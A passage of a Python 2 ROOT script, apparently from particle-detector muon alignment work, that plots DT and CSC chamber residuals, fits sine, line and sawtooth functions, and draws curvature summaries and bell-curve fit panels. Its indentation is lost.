if param == "dxdz": hist.SetYTitle("dx'/dz residual (mrad)")
if param == "y": hist.SetYTitle("y' residual (mm)")
if param == "dydz": hist.SetYTitle("dy'/dz residual (mrad)")
if "CSC" in name:
if param == "x": hist.SetYTitle("r#phi residual (mm)")
if param == "dxdz": hist.SetYTitle("d(r#phi)/dz residual (mrad)")
hist.SetMarkerColor(ROOT.kBlack)
hist.SetLineColor(ROOT.kBlack)
hist.Draw()
hist2d.Draw("colzsame")
if widebins: hist.Draw("samee1")
else: hist.Draw("same")
hpeaks.SetMarkerStyle(20)
hpeaks.SetMarkerSize(0.9)
hpeaks.SetMarkerColor(ROOT.kRed)
hpeaks.SetLineColor(ROOT.kRed)
hpeaks.SetLineWidth(2)
#if fitpeaks: hpeaks.Draw("same")
hpeaks.Draw("same")
if fitsine and "vsphi" in name:
global fitsine_const, fitsine_sin, fitsine_cos, fitsine_chi2, fitsine_ndf
if 'CSC' in name:
f = ROOT.TF1("f", "[0] + [1]*sin(x) + [2]*cos(x)", -pi/180.*5., pi*(2.-5./180.))
else:
f = ROOT.TF1("f", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
f.SetLineColor(ROOT.kRed)
f.SetLineWidth(2)
if len(fixfitpars)>0:
for fpar in fixfitpars.keys():
f.FixParameter(fpar, fixfitpars[fpar])
#hist.Fit(f,"N")
if fitpeaks: hpeaks.Fit(f,"NQ")
else: hist.Fit(f,"NEQ")
if len(fixfitpars)>0:
for fpar in fixfitpars.keys():
f.ReleaseParameter(fpar)
fitsine_const = f.GetParameter(0), f.GetParError(0)
fitsine_sin = f.GetParameter(1), f.GetParError(1)
fitsine_cos = f.GetParameter(2), f.GetParError(2)
fitsine_chi2 = f.GetChisquare()
fitsine_ndf = f.GetNDF()
global MAP_RESULTS_FITSIN
# 'phi' coefficienct will be updated further for CSC
MAP_RESULTS_FITSIN[id] = {'a':fitsine_const, 'phi':fitsine_const, 'sin': fitsine_sin, 'cos': fitsine_cos, 'chi2': fitsine_chi2, 'ndf': fitsine_ndf}
f.Draw("same")
global fitsine_ttext, fitsine_etext
text_xposition = -1.
if 'CSC' in name: text_xposition = 2.
fitsine_ttext = ROOT.TLatex(text_xposition, 0.8*window,
"%+.3f %+.3f sin#phi %+.3f cos#phi" % (fitsine_const[0], fitsine_sin[0], fitsine_cos[0]))
fitsine_ttext.SetTextColor(ROOT.kRed)
fitsine_ttext.SetTextSize(0.05)
fitsine_ttext.Draw()
fitsine_etext = ROOT.TLatex(text_xposition, 0.70*window,
" #pm%.3f #pm%.3f #pm%.3f" % (fitsine_const[1], fitsine_sin[1], fitsine_cos[1]))
fitsine_etext.SetTextColor(ROOT.kRed)
fitsine_etext.SetTextSize(0.045)
fitsine_etext.Draw()
# additional estimate of phiz ring rotation from 1d distribution
if 'CSC' in name and add1d:
# zero-order rough fit to obtain the fitting range:
f0 = ROOT.TF1("f0", "gaus", hist1d.GetBinLowEdge(1), -hist1d.GetBinLowEdge(1))
fit = hist1d.Fit(f0,"NRQ")
rangea, rangeb = hist1d.GetMean() - hist1d.GetRMS(), hist1d.GetMean() + hist1d.GetRMS()
if fit==0: rangea, rangeb = f0.GetParameter(1) - f0.GetParameter(2), f0.GetParameter(1) + f0.GetParameter(2)
#print rangea, rangeb
# second fit for finding the peak:
f1 = ROOT.TF1("f1", "gaus", rangea, rangeb)
fit = hist1d.Fit(f1,"NRQ")
nn = hist1d.GetEntries()
dphiz, ephiz = 0, 0
if nn>0: dphiz, ephiz = hist1d.GetMean(), ROOT.TMath.StudentQuantile(0.841345,nn) * hist1d.GetRMS() / sqrt(nn)
if fit==0: dphiz, ephiz = f1.GetParameter(1), f1.GetParError(1)
#print dphiz, ephiz
MAP_RESULTS_FITSIN[id]['phi'] = (dphiz, ephiz)
global ttex_sine_, ttex_sine, ttex_1d_, ttex_1d
postal_address = idToPostalAddress(id+'/01')
ttex_sine_ = ROOT.TLatex(0, 0.8*window,"#Delta#phi_{z}^{sine} (mrad):")
ttex_sine_.SetTextColor(ROOT.kGreen+2); ttex_sine_.SetTextSize(0.04); ttex_sine_.Draw()
ttex_sine = ROOT.TLatex(0, 0.7*window," %+.3f#pm%.3f" %
(-100*fitsine_const[0]/signConventions[postal_address][3],
100*fitsine_const[1]/signConventions[postal_address][3]))
ttex_sine.SetTextColor(ROOT.kGreen+2); ttex_sine.SetTextSize(0.04); ttex_sine.Draw()
ttex_1d_ = ROOT.TLatex(0, 0.6*window,"#Delta#phi_{z}^{phi} (mrad):")
ttex_1d_.SetTextColor(ROOT.kGreen+2); ttex_1d_.SetTextSize(0.04); ttex_1d_.Draw()
ttex_1d = ROOT.TLatex(0, 0.5*window," %+.3f#pm%.3f" % (-dphiz, ephiz))
ttex_1d.SetTextColor(ROOT.kGreen+2); ttex_1d.SetTextSize(0.04); ttex_1d.Draw()
ROOT.gPad.Update()
if fitline:
f = ROOT.TF1("f", "[0] + [1]*x", -1000., 1000.)
hist2d.Fit(f, "q")
hist2d.GetFunction("f").SetLineColor(ROOT.kRed)
global fitline_const, fitline_linear, fitline_chi2, fitline_ndf
fitline_const = hist2d.GetFunction("f").GetParameter(0), hist2d.GetFunction("f").GetParError(0)
fitline_linear = hist2d.GetFunction("f").GetParameter(1), hist2d.GetFunction("f").GetParError(1)
fitline_chi2 = hist2d.GetFunction("f").GetChisquare()
fitline_ndf = hist2d.GetFunction("f").GetNDF()
hist2d.GetFunction("f").Draw("same")
global fitline_ttext
if "vsz" in name: which = "Z"
elif "vsr" in name: which = "R"
fitline_ttext = ROOT.TText(hist.GetBinCenter(hist.GetNbinsX()/4),
0.8*window, "%.3g %+.3g %s" % (fitline_const[0], fitline_linear[0], which))
fitline_ttext.SetTextColor(ROOT.kRed)
fitline_ttext.Draw()
ROOT.gPad.RedrawAxis()
if "vsphi" in name:
if not widebins: philines(name, window, abscissa)
if abscissa is None:
if 'CSC' in name:
tline1 = ROOT.TLine(-pi/180.*5., 0, pi*(2.-5./180.), 0); tline1.Draw()
tline2 = ROOT.TLine(-pi/180.*5., -window, pi*(2.-5./180.), -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(-pi/180.*5., window, pi*(2.-5./180.), window); tline3.Draw()
else:
tline1 = ROOT.TLine(-pi, 0, pi, 0); tline1.Draw()
tline2 = ROOT.TLine(-pi, -window, pi, -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(-pi, window, pi, window); tline3.Draw()
else:
tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
elif "vsz" in name:
if not widebins: zlines(window, abscissa)
if abscissa is None:
tline1 = ROOT.TLine(-660, 0, 660, 0); tline1.Draw()
tline2 = ROOT.TLine(-660, -window, 660, -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(-660, window, 660, window); tline3.Draw()
else:
tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
elif "vsr" in name:
if "mem1" in name or "mep1" in name and not widebins: rlines(1, window, abscissa)
if "mem2" in name or "mep2" in name and not widebins: rlines(2, window, abscissa)
if "mem3" in name or "mep3" in name and not widebins: rlines(3, window, abscissa)
if "mem4" in name or "mep4" in name and not widebins: rlines(4, window, abscissa)
if abscissa is None:
tline1 = ROOT.TLine(100, 0, 700, 0); tline1.Draw()
tline2 = ROOT.TLine(100, -window, 700, -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(100, window, 700, window); tline3.Draw()
else:
tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
if "vsphi" in name and fitsawteeth:
global CPP_LOADED
if not CPP_LOADED:
phiedges2c()
ROOT.gROOT.ProcessLine(".L phiedges_fitfunctions.C++")
CPP_LOADED = True
fn={0: ROOT.fitf0,
1: ROOT.fitf2,
2: ROOT.fitf2,
3: ROOT.fitf3,
4: ROOT.fitf4,
5: ROOT.fitf5,
6: ROOT.fitf6,
7: ROOT.fitf7,
8: ROOT.fitf8,
9: ROOT.fitf9,
10: ROOT.fitf10,
11: ROOT.fitf11,
12: ROOT.fitf12,
13: ROOT.fitf13
} [stationIndex(name)]
fn.SetNpx(5000)
fn.SetLineColor(ROOT.kYellow)
hist.Fit(fn,"N")
fn.Draw("same")
# get properly arranged phi edges
edges = (phiedges[stationIndex(name)])[:]
ed = sorted(edges)
# add some padding to the end
ed.append(pi+abs(ed[0]))
global sawtooth_a, sawtooth_b
sawtooth_a = []
sawtooth_da = []
sawtooth_b = []
for pr in range(0,fn.GetNpar(),2):
sawtooth_a.append( (fn.GetParameter(pr), fn.GetParError(pr)) )
sawtooth_b.append( (fn.GetParameter(pr+1), fn.GetParError(pr+1)) )
sawtooth_da.append( (fn.Eval(ed[pr/2]+0.01), fn.Eval(ed[pr/2+1]-0.01)) )
global MAP_RESULTS_SAWTOOTH
MAP_RESULTS_SAWTOOTH[id] = {'a': sawtooth_a, 'da': sawtooth_da, 'b': sawtooth_b, 'chi2': fn.GetChisquare(), 'ndf': fn.GetNDF()}
# fill number of contributiong bins
#ROOT.SetOwnership(hist,False)
ROOT.SetOwnership(hist2d,False)
ROOT.SetOwnership(hist,False)
ROOT.SetOwnership(tline1,False)
ROOT.SetOwnership(tline2,False)
ROOT.SetOwnership(tline3,False)
return hist
def mapNameToId(name):
if "DT" in name:
wh = "-ALL"
if name.find('wh')>1: wh = name[name.find('wh')+2]
if wh == "A": w = "-2"
elif wh == "B": w = "-1"
elif wh == "C": w = "-0"
elif wh == "D": w = "+1"
elif wh == "E": w = "+2"
elif wh == "-ALL": w = "-ALL"
else: return None
station=''
if wh == "-ALL":
if name.find('sec')<0: return None
station = name[name.find('sec')-1]
sector = ''
sector = name[name.find('sec')+3:name.find('sec')+5]
return "MB%s/%s/%s" % (w, station, sector)
if name.find('st')>1: station = name[name.find('st')+2]
else: return None
return "MB%s/%s" % (w, station)
elif "CSC" in name:
p = name.find('me')
if p<0: return None
if name[p+2]=="p": endcap = "+"
elif name[p+2]=="m": endcap = "-"
else: return None
station = name[p+3]
pch = name.find('ch')
if pch<0:
ring = name[p+4]
return "ME%s%s/%s" % (endcap, station, ring)
ring = 'ALL'
chamber = name[pch+2:pch+4]
return "ME%s%s/%s/%s" % (endcap, station, ring, chamber)
return None
##################################################################################
# "param" may be one of "deltax" (Delta x position residuals),
# "deltadxdz" (Delta (dx/dz) angular residuals),
# "curverr" (Delta x * d(Delta q/pT)/d(Delta x) = Delta q/pT in the absence of misalignment)
def curvatureplot(tfiles, name, param, mode="from2d", window=15., widebins=False, title="", fitgauss=False, fitconst=False, fitline=False, fitpeaks=True, reset_palette=False):
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(0)
tdrStyle.SetOptStat(0)
tdrStyle.SetOptFit(0)
tdrStyle.SetTitleFontSize(0.05)
c1.Clear()
if reset_palette: set_palette("blues")
global hist, histCOPY, hist2d, tline1, tline2, tline3, tline4, tline5
hdir = "AlignmentMonitorMuonVsCurvature/iter1/"
if name not in ("all", "top", "bottom"):
hsuffix = "_%s_%s" % (name, param)
prof = tfiles[0].Get(hdir+"tprofile"+hsuffix).Clone("tprofile_"+hsuffix)
hist2d = tfiles[0].Get(hdir+"th2f"+hsuffix).Clone("th2f_"+hsuffix)
for tfile in tfiles[1:]:
prof.Add(tfile.Get(hdir+"tprofile"+hsuffix))
hist2d.Add(tfile.Get(hdir+"th2f"+hsuffix))
else:
prof = None
hist2d = None
for wheel in "m2", "m1", "z", "p1", "p2":
if name == "all": sectors = "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12"
elif name == "top": sectors = "01", "02", "03", "04", "05", "06"
elif name == "bottom": sectors = "07", "08", "09", "10", "11", "12"
else: raise Exception
for sector in sectors:
hsuffix = "_%s_%s" % ("wheel%s_sector%s" % (wheel, sector), param)
for tfile in tfiles:
if prof is None:
prof = tfiles[0].Get(hdir+"tprofile"+hsuffix).Clone("tprofile_"+hsuffix)
hist2d = tfiles[0].Get(hdir+"th2f"+hsuffix).Clone("tprofile_"+hsuffix)
else:
prof.Add(tfile.Get(hdir+"tprofile"+hsuffix))
hist2d.Add(tfile.Get(hdir+"th2f"+hsuffix))
hist = ROOT.TH1F("hist", "", prof.GetNbinsX(), prof.GetBinLowEdge(1), -prof.GetBinLowEdge(1))
for i in xrange(1, prof.GetNbinsX()+1):
hist.SetBinContent(i, prof.GetBinContent(i))
hist.SetBinError(i, prof.GetBinError(i))
if mode == "plain":
hist = prof
elif mode == "from2d":
skip = 1
if widebins:
hist.Rebin(5)
skip = 5
htmp = ROOT.gROOT.FindObject("tmp")
if htmp != None: htmp.Delete()
for i in xrange(0, int(prof.GetNbinsX()), skip):
tmp = hist2d.ProjectionY("tmp", i+1, i + skip)
if tmp.GetEntries() > 1:
hist.SetBinContent(i/skip+1, tmp.GetMean())
hist.SetBinError(i/skip+1, ROOT.TMath.StudentQuantile(0.841345,tmp.GetEntries()) * tmp.GetRMS() / sqrt(tmp.GetEntries()))
#hist.SetBinError(i/skip+1, tmp.GetRMS() / sqrt(tmp.GetEntries()))
else:
#hist.SetBinContent(i/skip+1, 2000.)
#hist.SetBinError(i/skip+1, 1000.)
hist.SetBinContent(i/skip+1, 0.)
hist.SetBinError(i/skip+1, 0.)
hpeaks = createPeaksProfile(hist2d, skip)
else:
raise Exception
if fitgauss:
f = ROOT.TF1("f", "[0] + [1]*exp(-x**2/2/0.01**2)", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
f.SetParameters(0, 0., 0.01)
if fitpeaks: hpeaks.Fit(f, "q")
else: hist.Fit(f, "q")
f.SetLineColor(ROOT.kRed)
global fitgauss_diff, fitgauss_chi2, fitgauss_ndf
# fitter = ROOT.TVirtualFitter.GetFitter()
# fitgauss_diff = f.GetParameter(0) - f.GetParameter(1), \
# sqrt(f.GetParError(0)**2 + f.GetParError(1)**2 + 2.*fitter.GetCovarianceMatrixElement(0, 1))
fitgauss_diff = f.GetParameter(1), f.GetParError(1)
fitgauss_chi2 = f.GetChisquare()
fitgauss_ndf = f.GetNDF()
global fitline_intercept, fitline_slope
if fitconst:
f = ROOT.TF1("f", "[0]", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
if fitpeaks: hpeaks.Fit(f, "q")
else: hist.Fit(f, "q")
f.SetLineColor(ROOT.kRed)
fitline_intercept = f.GetParameter(0), f.GetParError(0)
if fitline:
f = ROOT.TF1("f", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
if fitpeaks: hpeaks.Fit(f, "qNE")
else: hist.Fit(f, "qNE")
f.SetLineColor(ROOT.kRed)
global f2, f3
f2 = ROOT.TF1("2", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
f3 = ROOT.TF1("2", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
f2.SetParameters(f.GetParameter(0), f.GetParameter(1) + f.GetParError(1))
f3.SetParameters(f.GetParameter(0), f.GetParameter(1) - f.GetParError(1))
f2.SetLineColor(ROOT.kRed)
f3.SetLineColor(ROOT.kRed)
f2.SetLineStyle(2)
f3.SetLineStyle(2)
fitline_intercept = f.GetParameter(0), f.GetParError(0)
fitline_slope = f.GetParameter(1), f.GetParError(1)
hist2d.SetAxisRange(-window, window, "Y")
hist2d.SetMarkerStyle(20)
hist2d.SetMarkerSize(0.75)
hist2d.GetXaxis().CenterTitle()
hist2d.GetYaxis().CenterTitle()
if param == "curverr":
hist2d.GetYaxis().SetTitleOffset(1.35)
else:
hist2d.GetYaxis().SetTitleOffset(0.75)
hist2d.GetXaxis().SetTitleOffset(1.2)
hist2d.GetXaxis().SetTitleSize(0.05)
hist2d.GetYaxis().SetTitleSize(0.05)
hist2d.SetTitle(title)
if param == "pterr": hist2d.SetXTitle("qp_{T} (GeV/c)")
else: hist2d.SetXTitle("q/p_{T} (c/GeV)")
if param == "deltax": hist2d.SetYTitle("#Deltax' (mm)")
if param == "deltadxdz": hist2d.SetYTitle("#Deltadx'/dz (mrad)")
if param == "pterr": hist2d.SetYTitle("#Deltap_{T}/p_{T} (%)")
if param == "curverr": hist2d.SetYTitle("#Deltaq/p_{T} (c/GeV)")
hist2d.Draw("colz")
hist.SetMarkerColor(ROOT.kBlack)
hist.SetLineColor(ROOT.kBlack)
hist.Draw("same")
#histCOPY = hist.Clone()
#histCOPY.SetXTitle("")
#histCOPY.SetYTitle("")
#if widebins:
# histCOPY.Draw("samee1")
# histCOPY.Draw("sameaxis")
#else:
# histCOPY.Draw("same")
# histCOPY.Draw("sameaxis")
if fitline:
f.Draw("same")
#f2.Draw("same")
#f3.Draw("same")
hpeaks.SetMarkerStyle(20)
hpeaks.SetMarkerSize(0.9)
hpeaks.SetMarkerColor(ROOT.kRed)
hpeaks.SetLineColor(ROOT.kRed)
hpeaks.SetLineWidth(2)
#if fitpeaks: hpeaks.Draw("same")
hpeaks.Draw("same")
#tline1 = ROOT.TLine(hist.GetBinLowEdge(1), -window, hist.GetBinLowEdge(1), window)
#tline2 = ROOT.TLine(hist.GetBinLowEdge(1), window, -hist.GetBinLowEdge(1), window)
#tline3 = ROOT.TLine(-hist.GetBinLowEdge(1), window, -hist.GetBinLowEdge(1), -window)
#tline4 = ROOT.TLine(-hist.GetBinLowEdge(1), -window, hist.GetBinLowEdge(1), -window)
tline5 = ROOT.TLine(-hist.GetBinLowEdge(1), 0., hist.GetBinLowEdge(1), 0.)
tline5.Draw()
#for t in tline1, tline2, tline3, tline4, tline5: t.Draw()
def curvatureDTsummary(tfiles, window=15., pdgSfactor=False):
global h, gm2, gm1, gz, gp1, gp2, tlegend
set_palette("blues")
phis = {-2: [], -1: [], 0: [], 1: [], 2: []}
diffs = {-2: [], -1: [], 0: [], 1: [], 2: []}
differrs = {-2: [], -1: [], 0: [], 1: [], 2: []}
for wheelstr, wheel in ("m2", "-2"), ("m1", "-1"), ("z", "0"), ("p1", "+1"), ("p2", "+2"):
for sector in "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12":
curvatureplot(tfiles, "wheel%s_sector%s" % (wheelstr, sector), "deltax",
title="Wheel %s, sector %s" % (wheel, sector), fitgauss=True, reset_palette=False)
if fitgauss_diff[1] < window:
uncertainty = fitgauss_diff[1]
if pdgSfactor and (fitgauss_chi2/fitgauss_ndf) > 1.: uncertainty *= sqrt(fitgauss_chi2/fitgauss_ndf)
phis[int(wheel)].append(signConventions["DT", int(wheel), 1, int(sector)][4])
diffs[int(wheel)].append(fitgauss_diff[0])
differrs[int(wheel)].append(uncertainty)
h = ROOT.TH1F("h", "", 1, -pi, pi)
h.SetAxisRange(-window, window, "Y")
h.SetXTitle("#phi (rad)")
h.SetYTitle("#Deltax(p_{T} #rightarrow #infty) - #Deltax(p_{T} #rightarrow 0) (mm)")
h.GetXaxis().CenterTitle()
h.GetYaxis().CenterTitle()
gm2 = ROOT.TGraphErrors(len(phis[-2]), array.array("d", phis[-2]), array.array("d", diffs[-2]),
array.array("d", [0.]*len(phis[-2])), array.array("d", differrs[-2]))
gm1 = ROOT.TGraphErrors(len(phis[-1]), array.array("d", phis[-1]), array.array("d", diffs[-1]),
array.array("d", [0.]*len(phis[-1])), array.array("d", differrs[-1]))
gz = ROOT.TGraphErrors(len(phis[0]), array.array("d", phis[0]), array.array("d", diffs[0]),
array.array("d", [0.]*len(phis[0])), array.array("d", differrs[0]))
gp1 = ROOT.TGraphErrors(len(phis[1]), array.array("d", phis[1]), array.array("d", diffs[1]),
array.array("d", [0.]*len(phis[1])), array.array("d", differrs[1]))
gp2 = ROOT.TGraphErrors(len(phis[2]), array.array("d", phis[2]), array.array("d", diffs[2]),
array.array("d", [0.]*len(phis[2])), array.array("d", differrs[2]))
gm2.SetMarkerStyle(21); gm2.SetMarkerColor(ROOT.kRed); gm2.SetLineColor(ROOT.kRed)
gm1.SetMarkerStyle(22); gm1.SetMarkerColor(ROOT.kBlue); gm1.SetLineColor(ROOT.kBlue)
gz.SetMarkerStyle(3); gz.SetMarkerColor(ROOT.kBlack); gz.SetLineColor(ROOT.kBlack)
gp1.SetMarkerStyle(26); gp1.SetMarkerColor(ROOT.kBlue); gp1.SetLineColor(ROOT.kBlue)
gp2.SetMarkerStyle(25); gp2.SetMarkerColor(ROOT.kRed); gp2.SetLineColor(ROOT.kRed)
h.Draw()
tlegend = ROOT.TLegend(0.25, 0.2, 0.85, 0.5)
tlegend.SetFillColor(ROOT.kWhite)
tlegend.SetBorderSize(0)
tlegend.AddEntry(gm2, "Wheel -2", "p")
tlegend.AddEntry(gm1, "Wheel -1", "p")
tlegend.AddEntry(gz, "Wheel 0", "p")
tlegend.AddEntry(gp1, "Wheel +1", "p")
tlegend.AddEntry(gp2, "Wheel +2", "p")
tlegend.Draw()
gm2.Draw("p")
gm1.Draw("p")
gz.Draw("p")
gp1.Draw("p")
gp2.Draw("p")
def getname(r):
if r.postal_address[0] == "DT":
wheel, station, sector = r.postal_address[1:]
return "DT wheel %d, station %d, sector %d" % (wheel, station, sector)
elif r.postal_address[0] == "CSC":
endcap, station, ring, chamber = r.postal_address[1:]
if endcap != 1: station = -1 * abs(station)
return "CSC ME%d/%d chamber %d" % (station, ring, chamber)
ddt=[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]
def clearDDT():
for i in range(0,15):
ddt[i]=0.
def printDeltaTs():
n = 0
for t in ddt:
if n==0 or n==7 or n==15: print "%d calls" % t
else: print "%d : %0.3f ms" % (n,t*1000.0)
n += 1
def bellcurves(tfile, reports, name, twobin=True, suppressblue=False):
t1 = time.time()
ddt[0] += 1
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.1)
tdrStyle.SetOptStat(0)
tdrStyle.SetHistMinimumZero()
c1.Clear()
c1.ResetAttPad()
found = False
for r in reports:
if r.name == name:
found = True
break
if not found: raise Exception("Not a valid name")
if r.status == "FAIL":
#raise Exception, "Fit failed"
print "Fit failed"
c1.Clear()
return
Pos = "Pos"; Neg = "Neg"
if not twobin:
Pos = ""; Neg = ""
pdirPos = "MuonAlignmentFromReference/%s%s" % (name, Pos)
pdirNeg = "MuonAlignmentFromReference/%s%s" % (name, Neg)
t2 = time.time()
ddt[1] = 1./ddt[0]*((ddt[0]-1)*ddt[1] + t2-t1)
chamber_x = tfile.Get(pdirPos+"_x")
chamber_x_fit = tfile.Get(pdirPos+"_x_fit")
chamber_y = tfile.Get(pdirPos+"_y")
chamber_y_fit = tfile.Get(pdirPos+"_y_fit")
chamber_dxdz = tfile.Get(pdirPos+"_dxdz")
chamber_dxdz_fit = tfile.Get(pdirPos+"_dxdz_fit")
chamber_dydz = tfile.Get(pdirPos+"_dydz")
chamber_dydz_fit = tfile.Get(pdirPos+"_dydz_fit")
chamber_alphax = tfile.Get(pdirPos+"_alphax")
chamber_alphax_fit = tfile.Get(pdirPos+"_alphax_fit")
chamber_alphay = tfile.Get(pdirPos+"_alphay")
chamber_alphay_fit = tfile.Get(pdirPos+"_alphay_fit")
if twobin:
chamber_x_fit2 = tfile.Get(pdirNeg+"_x_fit")
chamber_y_fit2 = tfile.Get(pdirNeg+"_y_fit")
chamber_dxdz_fit2 = tfile.Get(pdirNeg+"_dxdz_fit")
chamber_dydz_fit2 = tfile.Get(pdirNeg+"_dydz_fit")
chamber_alphax_fit2 = tfile.Get(pdirNeg+"_alphax_fit")
chamber_alphay_fit2 = tfile.Get(pdirNeg+"_alphay_fit")
if not chamber_x:
chamber_x = tfile.Get(pdirPos+"_residual")
chamber_x_fit = tfile.Get(pdirPos+"_residual_fit")
chamber_dxdz = tfile.Get(pdirPos+"_resslope")
chamber_dxdz_fit = tfile.Get(pdirPos+"_resslope_fit")
chamber_alphax = tfile.Get(pdirPos+"_alpha")
chamber_alphax_fit = tfile.Get(pdirPos+"_alpha_fit")
if twobin:
chamber_x_fit2 = tfile.Get(pdirNeg+"_residual_fit")
chamber_dxdz_fit2 = tfile.Get(pdirNeg+"_resslope_fit")
chamber_alphax_fit2 = tfile.Get(pdirNeg+"_alpha_fit")
if not chamber_x:
print "Can't find neither "+pdirPos+"_x nor "+pdirPos+"_residual"
return
t3 = time.time()
ddt[2] = 1./ddt[0]*((ddt[0]-1)*ddt[2] + t3-t2)
####
chamber_x.SetAxisRange(-50., 50., "X")
if chamber_x.GetRMS()>15: chamber_x.SetAxisRange(-75., 75., "X")
chamber_dxdz.SetAxisRange(-30., 30., "X")
chamber_alphax.SetAxisRange(-50., 50., "X")
if not not chamber_y:
chamber_y.SetAxisRange(-75., 75., "X")
chamber_dydz.SetAxisRange(-120., 120., "X")
chamber_alphay.SetAxisRange(-120., 120., "X")
chamber_alphay.SetAxisRange(-75., 75., "Y")
####
chamber_x.SetXTitle("Local x residual (mm)")
chamber_dxdz.SetXTitle("Local dx/dz residual (mrad)")
chamber_alphax.SetXTitle("Local dx/dz residual (mrad)")
chamber_alphax.SetYTitle("Local x residual (mm)")
if not not chamber_y:
chamber_y.SetXTitle("Local y residual (mm)")
chamber_dydz.SetXTitle("Local dy/dz residual (mrad)")
chamber_alphay.SetXTitle("Local dy/dz residual (mrad)")
chamber_alphay.SetYTitle("Local y residual (mm)")
if name[0:2] == "ME":
chamber_x.SetXTitle("Local r#phi residual (mm)")
chamber_dxdz.SetXTitle("Local d(r#phi)/dz residual (mrad)")
chamber_alphax.SetXTitle("Local d(r#phi)/dz residual (mrad)")
chamber_alphax.SetYTitle("Local r#phi residual (mm)")
t4 = time.time()
ddt[3] = 1./ddt[0]*((ddt[0]-1)*ddt[3] + t4-t3)
for h in chamber_x, chamber_dxdz, chamber_alphax, chamber_alphax, \
chamber_y, chamber_dydz, chamber_alphay, chamber_alphay:
if not not h:
h.GetXaxis().CenterTitle()
h.GetYaxis().CenterTitle()
h.GetXaxis().SetLabelSize(0.05)
h.GetYaxis().SetLabelSize(0.05)
h.GetXaxis().SetTitleSize(0.07)
h.GetYaxis().SetTitleSize(0.07)
h.GetXaxis().SetTitleOffset(0.9)
h.GetYaxis().SetTitleOffset(0.9)
if twobin:
for f in chamber_x_fit2, chamber_y_fit2, chamber_dxdz_fit2, chamber_dydz_fit2, \
chamber_alphax_fit2, chamber_alphay_fit2:
if not not f:
f.SetLineColor(4)
if not twobin:
suppressblue = True
t5 = time.time()
ddt[4] = 1./ddt[0]*((ddt[0]-1)*ddt[4] + t5-t4)
global l1, l2, l3, l4
if not not chamber_y:
c1.Clear()
c1.Divide(3, 2)
chamber_x.SetTitle(getname(r))
c1.GetPad(1).cd()
chamber_x.Draw()
if not suppressblue: chamber_x_fit2.Draw("same")
chamber_x_fit.Draw("same")
l1 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
chamber_x_fit.GetParameter(1), chamber_x_fit.GetParError(1),
chamber_x_fit.GetParameter(2), chamber_x_fit.GetParError(2)))
l1.Draw()
c1.GetPad(2).cd()
chamber_dxdz.Draw()
if not suppressblue: chamber_dxdz_fit2.Draw("same")
chamber_dxdz_fit.Draw("same")
l2 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
chamber_dxdz_fit.GetParameter(1), chamber_dxdz_fit.GetParError(1),
chamber_dxdz_fit.GetParameter(2), chamber_dxdz_fit.GetParError(2)))
l2.Draw()
c1.GetPad(3).cd()
chamber_alphax.Draw("col")
if not suppressblue: chamber_alphax_fit2.Draw("same")
chamber_alphax_fit.Draw("same")
c1.GetPad(4).cd()
chamber_y.Draw()
if not suppressblue: chamber_y_fit2.Draw("same")
chamber_y_fit.Draw("same")
l3 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
chamber_y_fit.GetParameter(1), chamber_y_fit.GetParError(1),
chamber_y_fit.GetParameter(2), chamber_y_fit.GetParError(2)))
l3.Draw()
c1.GetPad(5).cd()
chamber_dydz.Draw()
if not suppressblue: chamber_dydz_fit2.Draw("same")
chamber_dydz_fit.Draw("same")
l4 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
chamber_dydz_fit.GetParameter(1), chamber_dydz_fit.GetParError(1),
chamber_dydz_fit.GetParameter(2), chamber_dydz_fit.GetParError(2)))
l4.Draw()
for lb in l1,l2,l3,l4:
lb.SetNDC(1)
lb.SetTextColor(ROOT.kRed)
c1.GetPad(6).cd()
chamber_alphay.Draw("col")
if not suppressblue: chamber_alphay_fit2.Draw("same")
chamber_alphay_fit.Draw("same")
else:
c1.Clear()
c1.Divide(3, 1)
chamber_x.SetTitle(getname(r))
c1.GetPad(1).cd()
chamber_x.Draw()
if not suppressblue: chamber_x_fit2.Draw("same")
chamber_x_fit.Draw("same")
l1 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
